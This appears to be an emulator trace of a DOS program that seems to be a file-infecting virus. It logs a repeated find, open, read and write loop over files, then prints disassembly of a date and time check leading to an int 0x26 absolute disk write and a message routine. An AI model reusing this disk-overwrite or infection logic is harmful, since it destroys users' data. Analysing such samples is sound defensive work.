2018-12-25T12:22:14.255794784Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:14.25889696Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:14.266941035Z 62 PC: 14190 | Close file
2018-12-25T12:22:14.275367478Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.27955447Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.286207801Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.292977003Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.310764294Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.313628534Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.325481775Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.331168389Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.337972831Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.346911974Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.350127621Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.356532481Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.362695731Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.364970857Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.367868983Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.375718687Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.378003169Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.384873356Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.392955687Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.395745708Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.403384254Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.40966223Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.411271336Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.415043826Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.432525431Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.434313891Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.441625045Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.449606243Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.452138097Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.459165476Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.465550974Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.467118398Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.473295401Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.481069349Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.48266544Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.489977103Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.498443499Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.501225914Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.508434671Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.515319Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.516967806Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.520199927Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.528707382Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.531038616Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.538063137Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.546399481Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.548995177Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.556130545Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.562710875Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.564524123Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.568406571Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.576402861Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.577788511Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.584575924Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.594968818Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.598329291Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.604746381Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.608120809Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.610231342Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.613023784Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:14.616033056Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:14.618109381Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2